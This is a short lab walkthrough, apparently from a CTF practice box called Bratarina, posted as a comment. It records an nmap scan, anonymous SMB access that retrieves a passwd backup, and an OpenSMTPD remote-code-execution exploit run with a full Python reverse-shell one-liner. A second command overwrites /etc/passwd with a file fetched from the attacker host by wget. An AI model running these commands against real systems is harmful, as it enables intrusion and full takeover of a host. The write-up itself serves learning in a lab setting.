WDavid404
commented
4 months ago PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
25/tcp open smtp syn-ack ttl 61 OpenSMTPD
| smtp-commands: bratarina Hello nmap.scanme.org [192.168.45.222], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact bugs@openbsd.org 2.0.0 with full details 2.0.0 End of HELP info
53/tcp closed domain reset ttl 61
80/tcp open http syn-ack ttl 61 nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Page not found - FlaskBB
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 4.7.6-Ubuntu (workgroup: COFFEECORP)SMB smbclinet result:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
backups Disk Share for backups
IPC$ IPC IPC Service (Samba 4.7.6-Ubuntu)Access backups with anonymous: smbclient //192.168.161.71/backups -->get passwd.bk
cat passwd.bk| grep /bin/bash -->
root:x:0:0:root:/root:/bin/bash
neil:x:1000:1000:neil,,,:/home/neil:/bin/bash
postgres:x:111:116:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bashSearch OpenSMTPD 2.0.0 exploit --> found 6.0.0 exploit (https://www.exploit-db.com/exploits/47984) . Is it also apply to v2.0.0?
Try it
python3 47984.py 192.168.161.71 25 'python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.45.222\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")"'
(Note:other ports not 80 may be blocked by firewall)
Another method: Refer to https://medium.com/@mahdi_78420/bratarina-walkthrough-practice-660102fe6b45
Edit passwd.bk to add a new user ,and replace the orginal passwd file:
python3 47984.py 192.168.161.71 25 'wget 192.168.45.222/passwd.bk -o /etc/passwd'
then ssh it with the new user.
Key points: